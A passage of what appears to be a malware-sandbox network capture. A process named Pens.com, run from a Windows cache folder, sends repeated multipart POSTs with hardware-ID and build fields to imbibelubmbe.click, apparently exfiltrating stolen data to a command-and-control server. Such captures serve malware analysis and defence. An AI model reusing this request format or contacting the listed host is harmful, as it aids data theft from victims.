2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 41 6d 36 71 64 4a 72 6e 47 4c 54 62 59 65 56 67 79 4c 33 37 57 32 46 58 38 4c 39 2f 68 39 67 66 6e 65 34 6f 67 6a 30 54 37 4e 41 58 4d 36 37 30 77 73 4e 4d 79 4b 66 64 35 57 48 6f 34 4f 63 36 63 56 2f 31 70 69 36 76 2b 45 75 31 34 6b 47 6e 47 43 76 4d 76 56 35 57 6d 6c 7a 4b 73 7a 69 41 6a 32 6e 4a 59 50 43 5a 79 33 64 42 58 39 43 4c 63 35 37 64 4f 71 58 4b 61 49 4a 6c 45 30 69 64 57 67 36 69 53 4b 37 33 61 5a 44 75 59 62 52 63 39 4b 7a 65 50 6e 46 50 36 49 74 66 72 2b 77 44 74 65 49 4a 79 7a 67 50 37 4a 55 36 47 6f 5a 73 6e 6f 4d 6b 76 4b 39 42 6d 57 7a 51 31 63 73 58 4f 45 4c 39 70 31 50 4f 33 57 4b 6c 44 68 58 44 52 42 37 34 64 55 35 65 39 6c 79 32 6e 67 54 74 71 7a 7a 52 51 4e 6d 63 76 6c 39 70 66 2b 43 72 63 36 76 34 4d 35 48 43 4c 5a 63 41 43 2b 43 Data Ascii: Am6qdJrnGLTbYeVgyL37W2FX8L9/h9gfne4ogj0T7NAXM670wsNMyKfd5WHo4Oc6cV/1pi6v+Eu14kGnGCvMvV5WmlzKsziAj2nJYPCZy3dBX9CLc57dOqXKaIJlE0idWg6iSK73aZDuYbRc9KzePnFP6Itfr+wDteIJyzgP7JU6GoZsnoMkvK9BmWzQ1csXOEL9p1PO3WKlDhXDRB74dU5e9ly2ngTtqzzRQNmcvl9pf+Crc6v4M5HCLZcAC+C
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 68 32 43 30 6a 7a 31 6b 30 58 67 58 59 6d 64 30 30 4e 39 52 2b 79 44 66 35 50 41 45 2b 33 2b 46 63 73 41 46 39 79 46 4a 6c 4b 61 52 4b 71 72 49 4b 53 6a 62 63 31 41 31 49 6a 65 5a 6e 46 66 70 61 59 75 72 31 67 33 69 65 64 6b 36 67 52 75 79 4e 51 57 54 70 39 78 34 36 38 45 75 49 64 78 35 56 44 55 6b 5a 64 62 61 51 76 45 6b 32 66 6e 39 43 2b 78 34 6a 32 33 43 41 76 6f 6e 53 59 61 69 6e 43 4f 67 67 57 70 6b 30 57 77 58 59 6d 64 55 77 4d 70 61 39 69 58 46 34 50 59 44 2f 33 69 53 49 49 39 45 37 53 74 55 31 50 4f 4b 4d 4c 7a 47 4f 32 72 50 4e 46 41 32 5a 79 2b 58 32 6c 6e 33 4c 74 58 6c 35 51 58 76 65 6f 31 70 79 41 44 30 4c 30 57 51 72 35 73 6c 71 4d 30 76 49 39 56 37 55 7a 4d 70 66 74 69 63 48 72 45 75 79 36 75 76 51 4d 68 75 67 57 7a 4d 52 4f 4e 69 58 4e 53 Data Ascii: h2C0jz1k0XgXYmd00N9R+yDf5PAE+3+FcsAF9yFJlKaRKqrIKSjbc1A1IjeZnFfpaYur1g3iedk6gRuyNQWTp9x468EuIdx5VDUkZdbaQvEk2fn9C+x4j23CAvonSYainCOggWpk0WwXYmdUwMpa9iXF4PYD/3iSII9E7StU1POKMLzGO2rPNFA2Zy+X2ln3LtXl5QXveo1pyAD0L0WQr5slqM0vI9V7UzMpfticHrEuy6uvQMhugWzMRONiXNS
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 4e 6c 6b 66 4a 5a 55 58 43 77 69 63 4d 47 65 5a 66 49 6e 33 65 7a 68 51 50 5a 4b 7a 43 44 41 52 4b 51 56 58 4e 53 39 33 48 6a 35 6a 32 51 32 6c 69 77 58 66 53 52 6c 78 64 70 54 35 79 71 55 31 63 6b 6e 2f 33 2b 46 63 4d 59 54 38 32 77 4c 31 4b 54 63 65 4a 4b 42 4c 53 50 4e 5a 55 45 33 4e 33 43 58 34 78 36 78 4d 5a 4f 7a 74 7a 58 71 65 34 78 6e 31 78 57 78 43 31 4f 65 72 49 77 6e 76 4d 35 6b 61 70 5a 79 46 32 4a 30 4f 5a 66 59 51 62 46 78 67 37 6d 73 56 62 6f 69 30 6a 4c 65 53 75 56 73 55 39 54 7a 7a 6d 37 72 30 32 52 38 6c 6a 4e 55 4b 44 56 78 31 4d 70 54 74 68 66 74 7a 4f 30 4e 37 32 4b 54 58 76 38 44 35 69 46 44 67 37 72 51 4e 61 6a 50 4b 69 50 41 4e 42 6c 36 4b 44 65 50 35 52 43 35 61 65 79 6c 74 78 69 70 4c 63 4a 56 77 67 72 79 4b 31 4f 46 35 72 73 36 Data Ascii: NlkfJZUXCwicMGeZfIn3ezhQPZKzCDARKQVXNS93Hj5j2Q2liwXfSRlxdpT5yqU1ckn/3+FcMYT82wL1KTceJKBLSPNZUE3N3CX4x6xMZOztzXqe4xn1xWxC1OerIwnvM5kapZyF2J0OZfYQbFxg7msVboi0jLeSuVsU9Tzzm7r02R8ljNUKDVx1MpTthftzO0N72KTXv8D5iFDg7rQNajPKiPANBl6KDeP5RC5aeyltxipLcJVwgryK1OF5rs6
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 54 45 4e 41 39 36 59 48 54 46 7a 6c 62 79 50 39 43 73 79 54 37 4f 65 34 56 68 31 78 54 72 49 33 75 71 76 70 38 75 70 63 59 79 4e 5a 59 36 46 7a 56 6e 4c 2b 36 63 47 4c 45 57 6e 61 76 76 51 4c 45 31 74 32 50 50 43 76 73 36 56 4e 6d 4d 6b 69 65 71 31 7a 51 7a 32 54 51 5a 65 69 45 33 6a 34 34 65 73 53 33 43 71 36 39 51 75 79 37 58 4d 35 5a 55 72 6a 4d 4c 6a 65 75 4b 59 50 4f 54 61 6d 54 45 4e 41 39 36 59 48 54 46 7a 6c 62 79 50 39 43 73 79 54 37 4f 65 34 56 68 31 78 54 72 49 77 71 36 6e 62 30 65 6c 64 51 6e 4b 74 68 7a 51 53 74 6e 4f 5a 66 54 45 4b 6b 51 6b 36 4f 33 50 36 63 31 6d 69 43 5a 52 4d 6b 76 53 35 71 73 69 6a 48 6d 35 69 6f 6a 31 32 4a 48 4c 53 67 34 2b 65 70 78 73 57 65 54 37 62 64 59 75 7a 76 43 5a 4e 42 45 70 48 77 58 7a 2f 37 50 64 2f 75 54 4f Data Ascii: TENA96YHTFzlbyP9CsyT7Oe4Vh1xTrI3uqvp8upcYyNZY6FzVnL+6cGLEWnavvQLE1t2PPCvs6VNmMkieq1zQz2TQZeiE3j44esS3Cq69Quy7XM5ZUrjMLjeuKYPOTamTENA96YHTFzlbyP9CsyT7Oe4Vh1xTrIwq6nb0eldQnKthzQStnOZfTEKkQk6O3P6c1miCZRMkvS5qsijHm5ioj12JHLSg4+epxsWeT7bdYuzvCZNBEpHwXz/7Pd/uTO
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 50 65 6e 38 33 2b 73 35 58 34 53 71 54 70 62 63 4d 71 53 33 43 62 64 4d 44 37 43 38 4a 6b 37 47 62 59 4c 53 50 50 57 54 41 4e 41 39 70 61 54 66 46 6e 41 69 78 62 74 33 6d 39 67 50 6e 64 70 42 79 78 77 66 71 4c 77 4b 71 6c 62 45 79 72 4e 45 6e 5a 75 64 35 55 79 77 79 64 4d 66 62 62 73 38 45 77 65 7a 6e 41 36 74 5a 68 57 33 4e 4f 73 49 62 56 4a 4f 37 33 67 61 6f 31 79 64 6b 6d 44 52 50 65 6e 38 33 2b 73 35 58 34 53 71 52 78 2f 41 4e 35 54 57 64 4c 74 68 45 36 6d 77 64 78 2b 58 63 4d 75 75 5a 5a 47 50 56 5a 6b 55 38 4a 47 48 55 6d 32 37 50 42 4d 48 73 35 77 4f 72 52 49 39 6b 31 78 48 2f 50 45 4b 71 6c 62 45 79 72 4e 45 6e 5a 76 4e 4f 46 51 73 78 64 4e 66 53 56 37 46 6e 6b 2f 4f 33 57 4b 6c 59 6b 47 66 52 42 37 34 4a 66 39 61 61 69 69 4f 72 7a 79 4e 6b 6d 44 Data Ascii: Pen83+s5X4SqTpbcMqS3CbdMD7C8Jk7GbYLSPPWTANA9paTfFnAixbt3m9gPndpByxwfqLwKqlbEyrNEnZud5UywydMfbbs8EweznA6tZhW3NOsIbVJO73gao1ydkmDRPen83+s5X4SqRx/AN5TWdLthE6mwdx+XcMuuZZGPVZkU8JGHUm27PBMHs5wOrRI9k1xH/PEKqlbEyrNEnZvNOFQsxdNfSV7Fnk/O3WKlYkGfRB74Jf9aaiiOrzyNkmD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:43 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VR3C7XZNNPUQ5WFU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18152 Host: imbibelubmbe.click
2024-12-29 16:55:43 UTC	15331	OUT	Data Raw: 2d 2d 56 52 33 43 37 58 5a 4e 4e 50 55 51 35 57 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 0d 0a 2d 2d 56 52 33 43 37 58 5a 4e 4e 50 55 51 35 57 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 52 33 43 37 58 5a 4e 4e 50 55 51 35 57 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 56 Data Ascii: --VR3C7XZNNPUQ5WFUContent-Disposition: form-data; name="hwid"27476D2C06DD51ACF049481E6580CD1C--VR3C7XZNNPUQ5WFUContent-Disposition: form-data; name="pid"2--VR3C7XZNNPUQ5WFUContent-Disposition: form-data; name="lid"jMw1IE--psyche--V
2024-12-29 16:55:43 UTC	2821	OUT	Data Raw: 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 Data Ascii: Sh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q
2024-12-29 16:55:44 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d6j9hjlij0nfltd3fge4aiv04d; expires=Thu, 24 Apr 2025 10:42:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZaOFhCSLJyr6uczDcwAdztpb4UQ6kdtHMtWyJKy019GJkn3axULbPdUTep076I%2BUG26KvhTxk5MS5Xepfl9jOwvBDXEYNf5b1BbkGaK30WUUyFf8xBed%2FvV37mDT9Hj8kpJ%2Fz7g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51c138158c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1787&rtt_var=678&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19114&delivery_rate=1604395&cwnd=214&unsent_bytes=0&cid=0189da6f9daf9850&ts=1159&x=0"
2024-12-29 16:55:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 16:55:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:45 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=S5QCTGYBA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8731 Host: imbibelubmbe.click
2024-12-29 16:55:45 UTC	8731	OUT	Data Raw: 2d 2d 53 35 51 43 54 47 59 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 0d 0a 2d 2d 53 35 51 43 54 47 59 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 35 51 43 54 47 59 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 53 35 51 43 54 47 59 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --S5QCTGYBAContent-Disposition: form-data; name="hwid"27476D2C06DD51ACF049481E6580CD1C--S5QCTGYBAContent-Disposition: form-data; name="pid"2--S5QCTGYBAContent-Disposition: form-data; name="lid"jMw1IE--psyche--S5QCTGYBAContent-Dis
2024-12-29 16:55:46 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9dfevn7gv6fqt43tega5mnokl7; expires=Thu, 24 Apr 2025 10:42:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lcyqqs43tgxuopYoGz4mPuFmtB1gWtw4oTW87co3YwztJszTQZ9f1bXTBvzAY0O2hTVA8WGLFnWvwgIuOQWxLJZ9fhNgVi%2FCUCxWBNCJTwylWOCN%2BtFvWcGIUlj9HxowTaTu2g0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51d0ae4043b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2047&rtt_var=775&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9663&delivery_rate=1405873&cwnd=203&unsent_bytes=0&cid=4db960765043d09e&ts=950&x=0"
2024-12-29 16:55:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 16:55:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:48 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RQUDS4ZVEU28UFUHH0U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20444 Host: imbibelubmbe.click
2024-12-29 16:55:48 UTC	15331	OUT	Data Raw: 2d 2d 52 51 55 44 53 34 5a 56 45 55 32 38 55 46 55 48 48 30 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 0d 0a 2d 2d 52 51 55 44 53 34 5a 56 45 55 32 38 55 46 55 48 48 30 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 51 55 44 53 34 5a 56 45 55 32 38 55 46 55 48 48 30 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 Data Ascii: --RQUDS4ZVEU28UFUHH0UContent-Disposition: form-data; name="hwid"27476D2C06DD51ACF049481E6580CD1C--RQUDS4ZVEU28UFUHH0UContent-Disposition: form-data; name="pid"3--RQUDS4ZVEU28UFUHH0UContent-Disposition: form-data; name="lid"jMw1IE--ps
2024-12-29 16:55:48 UTC	5113	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 Data Ascii: `M?lrQMn 64F6(X&7~
2024-12-29 16:55:51 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bv06dhfjsr2eic3g5jik3877et; expires=Thu, 24 Apr 2025 10:42:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gHtBl2S%2BzCDl8bRUCZA4zRGF0hdq2Jt5dw73ljnx7uX0Yd8sojCVdfoP2rdeThSfddmW7cdLoXvUrefBfzyr5f6MKimAT%2FrfEBZTulCBycyfPNA9ojZqlHU258akX%2B1FfhZlHU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51dedfc55e67-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1619&rtt_var=609&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21409&delivery_rate=1803582&cwnd=243&unsent_bytes=0&cid=8a70fd76a09367fc&ts=2912&x=0"
2024-12-29 16:55:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 16:55:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:52 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2SQS9UJZD3PUSOY3W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1241 Host: imbibelubmbe.click
2024-12-29 16:55:52 UTC	1241	OUT	Data Raw: 2d 2d 32 53 51 53 39 55 4a 5a 44 33 50 55 53 4f 59 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 0d 0a 2d 2d 32 53 51 53 39 55 4a 5a 44 33 50 55 53 4f 59 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 53 51 53 39 55 4a 5a 44 33 50 55 53 4f 59 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a Data Ascii: --2SQS9UJZD3PUSOY3WContent-Disposition: form-data; name="hwid"27476D2C06DD51ACF049481E6580CD1C--2SQS9UJZD3PUSOY3WContent-Disposition: form-data; name="pid"1--2SQS9UJZD3PUSOY3WContent-Disposition: form-data; name="lid"jMw1IE--psyche
2024-12-29 16:55:53 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pc7li88kbu2phe0do898tllemd; expires=Thu, 24 Apr 2025 10:42:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USMFZyw6P33QVvl0g3HK%2B7lrhc%2FM8PuSmLTkri5MU3QfVUHM6NjdytKxlASZW8WRNrtEeIQq9ZnO98XHreBG2POLzMDlr9O7UH6J8FlvLqRr%2F1lJPRtvSA4HpLxYzkIqhQ3HiGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51fa687a0f9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1510&rtt_var=573&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2159&delivery_rate=1898569&cwnd=193&unsent_bytes=0&cid=2601db6cee4dd500&ts=818&x=0"
2024-12-29 16:55:53 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 16:55:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:54 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OVZ3LKRZD3AZ8S17L6R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1131 Host: imbibelubmbe.click
2024-12-29 16:55:54 UTC	1131	OUT	Data Raw: 2d 2d 4f 56 5a 33 4c 4b 52 5a 44 33 41 5a 38 53 31 37 4c 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 0d 0a 2d 2d 4f 56 5a 33 4c 4b 52 5a 44 33 41 5a 38 53 31 37 4c 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 56 5a 33 4c 4b 52 5a 44 33 41 5a 38 53 31 37 4c 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 Data Ascii: --OVZ3LKRZD3AZ8S17L6RContent-Disposition: form-data; name="hwid"27476D2C06DD51ACF049481E6580CD1C--OVZ3LKRZD3AZ8S17L6RContent-Disposition: form-data; name="pid"1--OVZ3LKRZD3AZ8S17L6RContent-Disposition: form-data; name="lid"jMw1IE--ps
2024-12-29 16:55:55 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=db5qgejoohj7kbkblg3popvm6q; expires=Thu, 24 Apr 2025 10:42:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 